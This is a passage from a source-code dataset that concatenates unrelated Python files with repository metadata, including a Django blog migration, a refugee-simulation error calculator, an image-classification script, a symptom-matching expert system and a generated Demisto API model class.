] | matthew.j.sullivan1@gmail.com | |
5c91849062e2885f85a53812bea5f5ceee70b1f8 | 9e19dbd7edbd7112b1fb6e7205d74b8d2f861b29 | /blog/migrations/0003_post_postcomment.py | fce2d4561b02bb856240e05b8227a2ef06dcefdb | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | mkdika/pyniblog | 759029e5f56a947659caf72b5155bc4f60c655b0 | 0612836f7c91076a386d5d64ae22cc4fe9443964 | refs/heads/master | 2022-12-15T06:26:47.410114 | 2018-12-17T08:42:28 | 2018-12-17T08:42:28 | 144,513,321 | 1 | 0 | Apache-2.0 | 2022-12-08T02:46:23 | 2018-08-13T01:08:18 | JavaScript | UTF-8 | Python | false | false | 1,774 | py | # Generated by Django 2.1 on 2018-08-13 02:08
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated Django migration: creates the Post and PostComment tables.

    Generated by Django 2.1; avoid hand-editing beyond what makemigrations
    would produce.
    """

    dependencies = [
        # Post.user points at the (swappable) auth user model.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('blog', '0002_tag'),
    ]

    operations = [
        migrations.CreateModel(
            name='Post',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('permalink', models.CharField(max_length=255, unique=True)),
                ('title', models.CharField(max_length=255)),
                ('post_date', models.DateTimeField()),
                ('post_body', models.TextField()),
                # Draft/published flag; posts start unreleased.
                ('release', models.BooleanField(default=False)),
                # PROTECT: a Category with posts cannot be deleted.
                ('category', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='blog.Category')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'db_table': 'tb_post',
            },
        ),
        migrations.CreateModel(
            name='PostComment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=50)),
                ('email', models.CharField(max_length=100)),
                ('comment_body', models.TextField()),
                # NOTE(review): unconventional capitalized field name 'Post'
                # (column 'Post_id'); renaming now would require a migration.
                ('Post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.Post')),
            ],
            options={
                'db_table': 'tb_post_comment',
            },
        ),
    ]
| [
"mkdika@gmail.com"
] | mkdika@gmail.com |
5f370ef2e31dbd11f883fa883d71fbb1f8e88af7 | 751f0641c2896f554be4556a38c0e63a56fc3409 | /outputanalysis/CalculateDiagnostics.py | ddb1981b4c8e7bc5d1904a336ef584dc10f249a3 | [
"BSD-3-Clause"
] | permissive | selvex/flee-vis | 46faaa1f0daa846922b52b40167a33177c140a7d | 4728063ddd82602538356bc9bdb700658737920b | refs/heads/develop | 2020-05-02T07:43:29.311311 | 2019-05-07T12:32:33 | 2019-05-07T12:33:07 | 177,825,503 | 1 | 0 | BSD-3-Clause | 2019-05-07T12:35:37 | 2019-03-26T16:14:56 | Python | UTF-8 | Python | false | false | 2,712 | py | import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import StoreDiagnostics as dd
import analysis as a
def calculate_errors(out_dir, data, name, naieve_model=True):
    """Quantify mismatch between simulated and UNHCR camp registrations.

    Parameters:
        out_dir: label for the run, only used in the printed CSV row.
        data: pandas DataFrame with columns "<name> sim", "<name> data",
            "refugees in camps (simulation)" and "refugees in camps (UNHCR)".
        name: camp/location name used to select the columns.
        naieve_model: when True, also compute MASE scores against naive
            forecasts.

    Returns a StoreDiagnostics.LocationErrors with the error arrays filled in.

    NOTE(review): DataFrame.as_matrix() was removed in pandas 1.0 — this
    function only runs on old pandas; migrate to .to_numpy().
    NOTE(review): n1..n6 below are not defined anywhere in this function or
    visible module scope, so naieve_model=True raises NameError unless they
    are injected elsewhere — verify before use.
    """
    plt.clf()
    # data.loc[:,["%s sim" % name,"%s data" % name]]).as_matrix()
    y1 = data["%s sim" % name].as_matrix()
    y2 = data["%s data" % name].as_matrix()
    days = np.arange(len(y1))
    # Naive-forecast anchor days for the MASE variants below.
    naieve_early_day = 7
    naieve_training_day = 30
    # Rescaled values
    plt.clf()
    plt.xlabel("Days elapsed")
    plt.ylabel("Number of refugees")
    simtot = data["refugees in camps (simulation)"].as_matrix().flatten()
    untot = data["refugees in camps (UNHCR)"].as_matrix().flatten()
    # Rescale per-camp simulated counts so the simulated total matches the
    # UNHCR total on each day.
    y1_rescaled = np.zeros(len(y1))
    for i in range(0, len(y1_rescaled)):
        # Only rescale if simtot > 0
        if simtot[i] > 0:
            y1_rescaled[i] = y1[i] * untot[i] / simtot[i]
    """
    Error quantification phase:
    - Quantify the errors and mismatches for this camp.
    """
    lerr = dd.LocationErrors()
    # absolute difference
    lerr.errors["absolute difference"] = a.abs_diffs(y1, y2)
    # absolute difference (rescaled)
    lerr.errors["absolute difference rescaled"] = a.abs_diffs(y1_rescaled, y2)
    # ratio difference (denominator floored at 1 to avoid division by zero)
    lerr.errors["ratio difference"] = a.abs_diffs(y1, y2) / (np.maximum(untot, np.ones(len(untot))))
    """ Errors of which I'm usure whether to report:
    - accuracy ratio (forecast / true value), because it crashes if denominator is 0.
    - ln(accuracy ratio).
    """
    # We can only calculate the Mean Absolute Scaled Error if we have a naieve model in our plot.
    if naieve_model:
        # Number of observations (aggrgate refugee days in UNHCR data set for this location)
        lerr.errors["N"] = np.sum(y2)
        # flat naieve model (7 day) — n1..n6 are the naive forecast series;
        # see NameError note in the docstring.
        lerr.errors["MASE7"] = a.calculate_MASE(y1_rescaled, y2, n1, naieve_early_day)
        lerr.errors["MASE7-sloped"] = a.calculate_MASE(y1_rescaled, y2, n3, naieve_early_day)
        lerr.errors["MASE7-ratio"] = a.calculate_MASE(y1_rescaled, y2, n5, naieve_early_day)
        # flat naieve model (30 day)
        lerr.errors["MASE30"] = a.calculate_MASE(y1_rescaled, y2, n2, naieve_training_day)
        lerr.errors["MASE30-sloped"] = a.calculate_MASE(y1_rescaled, y2, n4, naieve_training_day)
        lerr.errors["MASE30-ratio"] = a.calculate_MASE(y1_rescaled, y2, n6, naieve_training_day)
    # Accuracy ratio doesn't work because of 0 values in the data.
    # One CSV-ish summary row per camp.
    print("%s,%s,%s,%s,%s,%s,%s,%s,%s" % (out_dir, name, lerr.errors["MASE7"],lerr.errors["MASE7-sloped"], lerr.errors["MASE7-ratio"],lerr.errors["MASE30"],lerr.errors["MASE30-sloped"],lerr.errors["MASE30-ratio"],lerr.errors["N"]))
    return lerr
| [
"djgroennl@gmail.com"
] | djgroennl@gmail.com |
5591cd156705758799a5e27fba12236c37d50142 | 2d575cd9beed6840de0ca787134354bb2511e44f | /tf_based/snml/np_based/test_multiprocessing.py | 823a89d948a24bf43002d2a1bbcc7753c8dba6d6 | [] | no_license | truythu169/snml-skip-gram | b949fdb35c6ed89364a8253025f41c7df85f4e7e | 02ff190a256724cbd5b656d7ea1cb235abb08863 | refs/heads/master | 2023-04-16T13:55:17.409637 | 2020-06-18T09:52:44 | 2020-06-18T09:52:44 | 210,846,786 | 1 | 0 | null | 2023-03-24T22:09:21 | 2019-09-25T13:03:20 | Python | UTF-8 | Python | false | false | 919 | py | from tf_based.snml.np_based.model import Model
from sklearn.metrics import mean_absolute_error
import time
if __name__ == "__main__":
model = Model('../models/100dim/',
'../context_distribution.pkl')
start = time.time()
snml_length, probs1 = model.snml_length_sampling_multiprocess(8229, 9023, epochs=31, neg_size=3000,
n_context_sample=600)
end = time.time()
print("Multiprocessing in {:.4f} sec".format(end - start))
print(snml_length)
start = time.time()
snml_length, probs2 = model.snml_length_sampling(8229, 9023, epochs=31, neg_size=3000, n_context_sample=600)
end = time.time()
print("Single process in {:.4f} sec".format(end - start))
print(snml_length)
# for i in range(len(probs1)):
# print(probs1[i], probs2[i])
print(mean_absolute_error(probs1, probs2))
| [
"hungpt169@gmail.com"
] | hungpt169@gmail.com |
76b75d6c6af4e2442a42808f2d9ff9b81eda8e17 | 1a12844079c3e39f071f2ec18d3a8e024c47bbde | /3_extract_hw/classifier_fcnn.py | cc5b9e06a3f648d4618118ed0ca7b2ab856ef370 | [] | no_license | psengeis/master_thesis_evaluation | 7c3bd3aa2b34ad4704deedef121a17d71a187867 | 836be58e6443579b95bee2ec2655d8e45163f35d | refs/heads/master | 2023-04-12T06:32:52.344485 | 2021-05-04T01:51:17 | 2021-05-04T01:51:17 | 363,448,996 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,062 | py | '''
This file can be used to test the models on input images. It includes features such as
1) Enabling CRF postprocessing
2) Enabling visualisations
3) Mean IoU calculations if a GT image is provided.
Run python 'classifier_fcnn.py -h' for more information
'''
import os
import argparse
import sys
import warnings
import cv2
from pathlib import Path
# import matplotlib.pyplot as plt
import numpy as np
import skimage.io as io
from fcn_helper_function import weighted_categorical_crossentropy, IoU
from img_utils import getbinim, max_rgb_filter, get_IoU, getBinclassImg, mask2rgb, rgb2mask
from keras.engine.saving import load_model
from post import crf
from skimage import img_as_float
from skimage.color import gray2rgb
# Silence library warnings unless the user asked for them on the command line.
if not sys.warnoptions:
    warnings.simplefilter("ignore")
# Force CPU-only execution: the GPU has too little memory for this model.
os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
# Sliding-window size and stride (10 px overlap between windows).
BOXWDITH = 256
STRIDE = BOXWDITH - 10
ROOT = Path(__file__).parent.absolute()
# model = None
def classify(image):
    """Run the FCN pixel classifier over an image with a sliding window.

    The image is binarized, padded up to a multiple of the window size,
    and each 256x256 window is standardized and fed to the network.
    Returns a float array of per-pixel class scores, 3 channels, cropped
    back to the input's height and width.

    NOTE(review): the model is reloaded from disk on every call — the
    commented-out lines suggest a module-level cache was intended.
    """
    # global model
    # if model is None:
    model = load_model(str(Path(ROOT, 'models/fcnn_bin.h5')), custom_objects={
        'loss': weighted_categorical_crossentropy([0.4, 0.5, 0.1]), 'IoU': IoU})
    orgim = np.copy(image)  # NOTE(review): unused
    image = img_as_float(gray2rgb(getbinim(image)))
    # Pad the canvas to whole windows (+1 column of slack on the width).
    maskw = int((np.ceil(image.shape[1] / BOXWDITH) * BOXWDITH)) + 1
    maskh = int((np.ceil(image.shape[0] / BOXWDITH) * BOXWDITH))
    mask = np.ones((maskh, maskw, 3))
    mask2 = np.zeros((maskh, maskw, 3))
    mask[0:image.shape[0], 0:image.shape[1]] = image
    # print("classifying image...")
    for y in range(0, mask.shape[0], STRIDE):
        x = 0
        if (y + BOXWDITH > mask.shape[0]):
            break
        while (x + BOXWDITH) < mask.shape[1]:
            # NOTE(review): `input` shadows the builtin.
            input = mask[y:y+BOXWDITH, x:x+BOXWDITH]
            # Per-window standardization; std floored at 1 for flat windows.
            std = input.std() if input.std() != 0 else 1
            mean = input.mean()
            mask2[y:y+BOXWDITH, x:x+BOXWDITH] = model.predict(
                np.array([(input-mean)/std]))[0]
            x = x + STRIDE
    return mask2[0:image.shape[0], 0:image.shape[1]]
def normalize(img):
    """Min-max normalize an image to the 0-255 range (per cv2.NORM_MINMAX)."""
    normalizedImg = cv2.normalize(img, np.zeros(img.shape[:2]), 0, 255, cv2.NORM_MINMAX)
    return normalizedImg
def tests(img):
    """Debug helper: show the image before and after normalize() side by side.

    Blocks until a key is pressed, then closes the windows.
    """
    initial = img.copy()
    tested = normalize(img)
    cv2.imshow('initial', initial)
    cv2.imshow('tested', tested)
    cv2.waitKey()
    cv2.destroyAllWindows()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--enableCRF", help="Use crf for postprocessing", action="store_true")
parser.add_argument(
"--input_image", help="input image file name", required=False)
parser.add_argument(
"--input_folder", help="input folder", required=False)
args = parser.parse_args()
images = None
if args.input_image is not None:
path = Path(args.input_image)
assert path.is_file()
images = [path]
elif args.input_folder is not None:
path = Path(args.input_folder)
assert path.is_dir()
images = path.glob('**/*.*')
assert images is not None
for img_path in images:
# initial_img = io.imread(str(img_path))
initial_img = cv2.imread(str(img_path))
initial_img = normalize(initial_img)
# tests(initial_img)
# continue
five_percent_height = int(initial_img.shape[0]/20)
five_percent_width = int(initial_img.shape[1]/20)
# take a selection of the image, if known where to search for
# initial_img = initial_img[five_percent_height * 7:five_percent_height * 11,
# 0:five_percent_width * 12,
# :]
initial_img = np.ascontiguousarray(initial_img)
# calculate scaling if needed - otherwise no upscale
img_scale = min(
1, min((1200/initial_img.shape[0]), (800/initial_img.shape[1])))
classified = classify(initial_img)
if args.enableCRF:
crf_result = crf(initial_img, classified)
else:
crf_result = None
if args.enableCRF:
handwriting_mask = np.zeros((crf_result.shape))
handwriting_mask[:, :][np.where(
(crf_result[:, :] == [0, 0, 2]).all(axis=2))] = [0, 1, 0]
handwriting_mask = cv2.resize(handwriting_mask, None,
fx=img_scale, fy=img_scale)
cv2.imshow('handwriting?', handwriting_mask)
init_shrink = cv2.resize(initial_img, None,
fx=img_scale, fy=img_scale)
fcn_shrink = cv2.resize(max_rgb_filter(classified), None,
fx=img_scale, fy=img_scale)
cv2.imshow('1', init_shrink)
cv2.imshow('2', fcn_shrink)
if args.enableCRF:
crf_shrink = cv2.resize(crf_result, None,
fx=img_scale, fy=img_scale)
cv2.imshow('3', mask2rgb(crf_shrink))
cv2.waitKey()
cv2.destroyAllWindows()
| [
"51302314+psengeis@users.noreply.github.com"
] | 51302314+psengeis@users.noreply.github.com |
52d448c05743fb7b9866e03a1b84835b435faaa3 | dd7d8722f9b0bcba72f65e543d6d053c803fead1 | /homework/AI2/ExpertSystem.py | ffca24b58ca37bf36e6731262673b2296eec246d | [] | no_license | bharatgupta77/sharad | 4079f56446952653412e767c48cdaf5507ab3704 | 88cb63789be37415dab26721a45fa92458a4d58e | refs/heads/master | 2020-08-26T19:33:31.159526 | 2019-10-23T18:32:59 | 2019-10-23T18:32:59 | 217,122,441 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,505 | py | import sys
# Knowledge-base file is the first CLI argument.
fileName = sys.argv[1]
# disease name -> list of symptom strings, filled by read().
symptomDictionary = {}
# NOTE(review): never used anywhere in this module.
symptomToDiseaseMap = {}
# disease name -> matched-symptom count, filled by detectDisease().
diseaseMatch = {}
def read(dataFileName=fileName):
    """Load the knowledge base into the global symptomDictionary.

    Each line is CSV: a quoted disease name followed by its symptoms.
    NOTE(review): the file handle is never closed, and symptoms are NOT
    lowercased here while detectDisease() lowercases user input — mixed-case
    data would never match.
    """
    dataFile = open(dataFileName, 'r')
    for line in dataFile:
        tokens = line.split(',')
        #print(tokens)
        symptomsList = []
        k=len(tokens[0])
        # Strip the surrounding quote characters from the disease name.
        diseaseName = tokens[0][1:k-1]
        #print(diseaseName)
        symptomCount = len(tokens)
        for index in range(1, symptomCount):
            symptom = tokens[index].strip()
            symptomsList.append(symptom)
            #symptomsList.append(tokens[index])
        symptomDictionary[diseaseName] = symptomsList
    print(symptomDictionary)
def detectDisease():
    """Prompt for symptoms and print a match percentage per disease.

    Percentages are each disease's matched-symptom count over the total
    matches across all diseases (so they sum to 100%% across diseases).
    """
    symptoms = input('Enter the symptoms(comma seperated): : ')
    symptomList = symptoms.split(',')
    inputSize = len(symptomList)
    # Normalize user input; note the KB side is not lowercased (see read()).
    for index in range(0, inputSize):
        symptomList[index] = symptomList[index].strip().lower()
    print('The given symptoms are: : ', symptomList)
    totalCount = 0.0
    for disease in symptomDictionary.keys():
        count = 0.0
        # NOTE(review): rebinds the outer `symptoms` string to the KB list.
        symptoms = symptomDictionary[disease]
        for symptom in symptomList:
            if symptom in symptoms:
                count += 1
        if count > 0:
            totalCount += count
            diseaseMatch[disease] = count
    # If nothing matched, diseaseMatch is empty and this loop prints nothing
    # (which also avoids dividing by a zero totalCount).
    for key, value in (diseaseMatch.items()):
        print('The possibility of having %s is %.2f %%' % (key, (value * 100)/totalCount))
# Module-level driver: load the knowledge base, then run one query.
read(fileName)
detectDisease()
| [
"piyush.chincholikar@gmail.com"
] | piyush.chincholikar@gmail.com |
12983b72754b482a37683f20711503f48106a09e | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/space-age/f673f9841b2949e0bd7dc80660c25315.py | 09e50b752cffa3b31a4b4ab1a1dc94f6af4c492a | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 933 | py | from math import floor
class SpaceAge:
    """Convert an age in seconds into years on each planet.

    Orbital periods are expressed in Earth years; one Earth year is
    31,557,600 seconds. Every result is kept to two decimal places.
    """

    # Seconds in one Earth (Julian) year.
    EARTH_YEAR_SECONDS = 31557600

    def __init__(self, seconds: float) -> None:
        # Raw age in seconds; every conversion derives from this.
        self.seconds = seconds

    def on_earth(self) -> float:
        """Age in Earth years, rounded to two decimals."""
        return round(self.seconds / self.EARTH_YEAR_SECONDS, 2)

    def _in_orbits(self, orbital_period: float) -> float:
        # Shared conversion: Earth years over the planet's orbital period
        # (itself measured in Earth years), rounded to two decimals.
        return round(self.on_earth() / orbital_period, 2)

    def on_mercury(self) -> float:
        return self._in_orbits(0.2408467)

    def on_venus(self) -> float:
        # Deliberately truncates (not rounds) to two decimals to sidestep a
        # floating-point precision mismatch in the reference test suite.
        return floor(self.on_earth() / 0.61519726 * 100) / 100

    def on_mars(self) -> float:
        return self._in_orbits(1.8808158)

    def on_jupiter(self) -> float:
        return self._in_orbits(11.862615)

    def on_saturn(self) -> float:
        return self._in_orbits(29.447498)

    def on_uranus(self) -> float:
        return self._in_orbits(84.016846)

    def on_neptune(self) -> float:
        return self._in_orbits(164.79132)
| [
"rrc@berkeley.edu"
] | rrc@berkeley.edu |
767974b507952de8497fd8484519d00a8b1e5f03 | 41fff566fc5486e9d928cc8ace95a86c85716661 | /train-code/.ipynb_checkpoints/trainFloat16-checkpoint.py | 18f73bb8d981340795586873831377327c7f877a | [] | no_license | CeciliaPYY/testFloat16 | 1da8a2e22f097ca650277b0f558db17c1c263a53 | eb621a5547d3d6b911d0bdae10cdb7bc3532c838 | refs/heads/master | 2020-04-07T16:42:20.148655 | 2018-11-21T11:48:10 | 2018-11-21T11:48:10 | 158,539,650 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,960 | py | import mxnet as mx
import numpy as np
import os, time, shutil
from mxnet import gluon, image, init, nd
from mxnet import autograd as ag
from mxnet.gluon import nn
from mxnet.gluon.data.vision import transforms
from gluoncv.utils import makedirs
from gluoncv.model_zoo import get_model
# 分割一下数据集~
# imglist = os.listdir("./classified-images/normal/") + os.listdir("./classified-images/terror/")
# trainPlusValNum = (terrorNum + normalNum)*0.7 # 8117
# testNum = (terrorNum + normalNum)*0.3 # 3479
# normalNum = 1335
# terrorNum = 10261
# ---- Hyperparameters and data-augmentation pipelines ----
classes = 2            # normal vs. terror
epochs = 40
lr = 0.001
per_device_batch_size = 256
momentum = 0.9
wd = 0.0001
# LR decays by lr_factor at each epoch in lr_steps (np.inf sentinel stops it).
lr_factor = 0.75
lr_steps = [10, 20, 30, np.inf]
num_gpus = 1
num_workers = 8
ctx = [mx.gpu(i) for i in range(num_gpus)] if num_gpus > 0 else [mx.cpu()]
batch_size = per_device_batch_size * max(num_gpus, 1)
# data augmentation
jitter_param = 0.4
lighting_param = 0.1
# Training: random crop/flip/color jitter; normalization uses the standard
# ImageNet mean/std (the backbone is ImageNet-pretrained).
transform_train = transforms.Compose([
    transforms.RandomResizedCrop(224),
    transforms.RandomFlipLeftRight(),
    transforms.RandomColorJitter(brightness=jitter_param, contrast=jitter_param,
                                 saturation=jitter_param),
    transforms.RandomLighting(lighting_param),
    transforms.ToTensor(),
    transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
# Evaluation: deterministic resize + center crop.
transform_test = transforms.Compose([
    transforms.Resize(256),
    transforms.CenterCrop(224),
    transforms.ToTensor(),
    transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
# define dataloader
from mxnet.gluon.data.vision import ImageFolderDataset
import cv2
class BKData(ImageFolderDataset):
    """ImageFolderDataset variant that loads images through OpenCV.

    Note cv2.imread returns BGR channel order, not RGB — the rest of the
    pipeline presumably tolerates or expects this; confirm before mixing
    with RGB-trained weights.
    """
    def __init__(self, *arg1, **arg2):
        super(BKData,self).__init__(*arg1,**arg2)
    def __getitem__(self, idx):
        '''
        Return (image, label) for sample idx, reading the image with the
        cv2 backend. Only the first three channels are kept (drops alpha).
        '''
        img = cv2.imread(self.items[idx][0])
        img = nd.array( img[:,:,:3]).astype(np.uint8)
        label = self.items[idx][1]
        # Apply the transform registered via transform_first(), if any.
        if self._transform is not None:
            return self._transform(img, label)
        return img, label
# ---- DataLoaders for the train/val/test splits under ./images ----
path = './images'
train_path = os.path.join(path, 'train')
val_path = os.path.join(path, 'val')
test_path = os.path.join(path, 'test')
train_data = gluon.data.DataLoader(
    BKData(train_path).transform_first(transform_train),
    batch_size=batch_size, shuffle=True, num_workers=num_workers)
val_data = gluon.data.DataLoader(
    BKData(val_path).transform_first(transform_test),
    batch_size=batch_size, shuffle=False, num_workers = num_workers)
test_data = gluon.data.DataLoader(
    BKData(test_path).transform_first(transform_test),
    batch_size=batch_size, shuffle=False, num_workers = num_workers)
# ---- Model: ImageNet-pretrained ResNet50_v2 with a fresh 2-class head ----
model_name = 'ResNet50_v2'
finetune_net = get_model(model_name, pretrained=True)
with finetune_net.name_scope():
    finetune_net.output = nn.Dense(classes)
# Only the new head needs initialization; pretrained weights are kept.
finetune_net.output.initialize(init.Xavier(), ctx = ctx)
finetune_net.collect_params().reset_ctx(ctx)
finetune_net.hybridize()
trainer = gluon.Trainer(finetune_net.collect_params(), 'sgd', {
    'learning_rate': lr, 'momentum': momentum, 'wd': wd})
metric = mx.metric.Accuracy()
L = gluon.loss.SoftmaxCrossEntropyLoss()
# define test
def test(net, val_data, ctx):
    """Evaluate net on val_data and return ('accuracy', value).

    Batches are split across the devices in ctx; even_split=False allows a
    ragged final batch.
    """
    metric = mx.metric.Accuracy()
    for i, batch in enumerate(val_data):
        data = gluon.utils.split_and_load(batch[0], ctx_list=ctx, batch_axis=0, even_split=False)
        label = gluon.utils.split_and_load(batch[1], ctx_list=ctx, batch_axis=0, even_split=False)
        outputs = [net(X) for X in data]
        metric.update(label, outputs)
    return metric.get()
# ---- Training loop ----
lr_counter = 0
num_batch = len(train_data)
import time  # NOTE(review): redundant — time is already imported at the top
t0 = time.time()
for epoch in range(epochs):
    # Step the learning-rate schedule at the configured epochs.
    if epoch == lr_steps[lr_counter]:
        trainer.set_learning_rate(trainer.learning_rate*lr_factor)
        lr_counter += 1
    tic = time.time()
    train_loss = 0
    metric.reset()
    for i, batch in enumerate(train_data):
        # Split each batch across devices; ragged last batch allowed.
        data = gluon.utils.split_and_load(batch[0], ctx_list=ctx, batch_axis=0, even_split=False)
        label = gluon.utils.split_and_load(batch[1], ctx_list=ctx, batch_axis=0, even_split=False)
        with ag.record():
            outputs = [finetune_net(X) for X in data]
            loss = [L(yhat, y) for yhat, y in zip(outputs, label)]
        for l in loss:
            l.backward()
        trainer.step(batch_size)
        # Average the per-device mean losses for logging.
        train_loss += sum([l.mean().asscalar() for l in loss]) / len(loss)
        metric.update(label, outputs)
    _, train_acc = metric.get()
    train_loss /= num_batch
    _, val_acc = test(finetune_net, val_data, ctx)
    print('[Epoch %d] Train-acc: %.3f, loss: %.3f | Val-acc: %.3f | time: %.1f' %
          (epoch, train_acc, train_loss, val_acc, time.time() - tic))
print("Training Duration is {}".format(time.time() - t0))
# Final held-out evaluation.
_, test_acc = test(finetune_net, test_data, ctx)
print('[Finished] Test-acc: %.3f' % (test_acc))
"18702602693@139.com"
] | 18702602693@139.com |
c66cf4794093353d10b617c6bc645d36290a7bda | 4c88477f18547df725150a5c29371f99af2a2acb | /Codeforces/Problems/Appleman.py | c195b73fa72a2a49da52580a25d02a4e7709ee7a | [] | no_license | SEETHAMRAJU/Competitive_Programming | 912b1e81d3cc07b5eeaebbf0086520700867df4e | b456a35766697363c9b77552a50db2ae1cc42ffd | refs/heads/master | 2020-03-26T09:15:23.047626 | 2019-10-06T05:06:42 | 2019-10-06T05:06:42 | 144,742,673 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 602 | py | def update(l,i,j):
if(i != 0):
l[i-1][j] += 1
if(i!=len(l)-1):
l[i+1][j] += 1
if(j!=0):
l[i][j-1] += 1
if(j!= len(l[0])-1):
l[i][j+1] += 1
return l
# Python 2 script (print statements, raw_input): read an n x n board of
# 'o'/'.' cells, count for every cell how many of its 4-neighbours are 'o',
# and answer YES iff every cell's count is even.
n = input()
l = []
for i in range(0,n):
    p = raw_input()
    l.append(p)
# x[i][j] = number of 'o' neighbours of cell (i, j).
x = []
for i in range(0,n):
    temp = [0]*n
    x.append(temp)
for i in range(0,n):
    for j in range(0,n):
        if(l[i][j] == "o"):
            update(x,i,j)
for i in range(0,n):
    for j in range(0,n):
        # NOTE(review): the `== 1` clause is redundant — 1 % 2 == 1 already.
        if(x[i][j]%2 == 1 or x[i][j] == 1 ):
            print "NO"
            exit()
print "YES"
| [
"spurvaj@gmail.com"
] | spurvaj@gmail.com |
3a44673f51aecec53577c003f0719dad6f4cb3a4 | 669ab595ae969c944a7583508b58b30d348099ce | /demisto_client/demisto_api/models/raw_message.py | 562f78bb79ed213c7db2bc878c8706e9f7bc1d27 | [
"Apache-2.0",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | demisto/demisto-py | 6f2d357884cee1fd488ad87edd78067a18a4f89a | f44bd0d8a38ac97b071d9c181f0137557077335d | refs/heads/master | 2023-08-17T13:41:47.924342 | 2023-06-05T09:04:27 | 2023-06-05T09:04:27 | 81,979,463 | 67 | 48 | Apache-2.0 | 2023-09-14T08:19:21 | 2017-02-14T19:09:05 | Python | UTF-8 | Python | false | false | 3,905 | py | # coding: utf-8
"""
Demisto API
This is the public REST API to integrate with the demisto server. HTTP request can be sent using any HTTP-client. For an example dedicated client take a look at: https://github.com/demisto/demisto-py. Requests must include API-key that can be generated in the Demisto web client under 'Settings' -> 'Integrations' -> 'API keys' Optimistic Locking and Versioning\\: When using Demisto REST API, you will need to make sure to work on the latest version of the item (incident, entry, etc.), otherwise, you will get a DB version error (which not allow you to override a newer item). In addition, you can pass 'version\\: -1' to force data override (make sure that other users data might be lost). Assume that Alice and Bob both read the same data from Demisto server, then they both changed the data, and then both tried to write the new versions back to the server. Whose changes should be saved? Alice’s? Bob’s? To solve this, each data item in Demisto has a numeric incremental version. If Alice saved an item with version 4 and Bob trying to save the same item with version 3, Demisto will rollback Bob request and returns a DB version conflict error. Bob will need to get the latest item and work on it so Alice work will not get lost. Example request using 'curl'\\: ``` curl 'https://hostname:443/incidents/search' -H 'content-type: application/json' -H 'accept: application/json' -H 'Authorization: <API Key goes here>' --data-binary '{\"filter\":{\"query\":\"-status:closed -category:job\",\"period\":{\"by\":\"day\",\"fromValue\":7}}}' --compressed ``` # noqa: E501
OpenAPI spec version: 2.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class RawMessage(object):
    """NOTE: This class is auto generated by the swagger code generator program.

    Do not edit the class manually.
    """
    """
    Attributes:
      swagger_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # This model declares no properties, so both mappings are empty and
    # to_dict() iterates over nothing.
    swagger_types = {
    }

    attribute_map = {
    }

    def __init__(self):  # noqa: E501
        """RawMessage - a model defined in Swagger"""  # noqa: E501
        self.discriminator = None

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        for attr, _ in six.iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                # Recurse into list elements that are themselves models.
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                # Recurse into dict values that are themselves models.
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        # Generated escape hatch for models that subclass dict.
        if issubclass(RawMessage, dict):
            for key, value in self.items():
                result[key] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, RawMessage):
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
| [
"1395797+glicht@users.noreply.github.com"
] | 1395797+glicht@users.noreply.github.com |
f31fffc22d0f0d9ff2a361231c5c89c920a811cb | 4caad96a952bc3d6db2dbf16d4a268c32678abfa | /post/post/urls.py | 23399f285510b154cbac35d98bf4c0f62cca4ad9 | [] | no_license | jvivianwang/bLOG | 3a2a6875579b2976140fd10c37aa3b1acb61e3bc | 193bbe28fac8d18198389320792989402b151b97 | refs/heads/master | 2022-11-22T05:05:22.933323 | 2020-07-27T23:31:05 | 2020-07-27T23:31:05 | 282,291,832 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,377 | py | """post URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
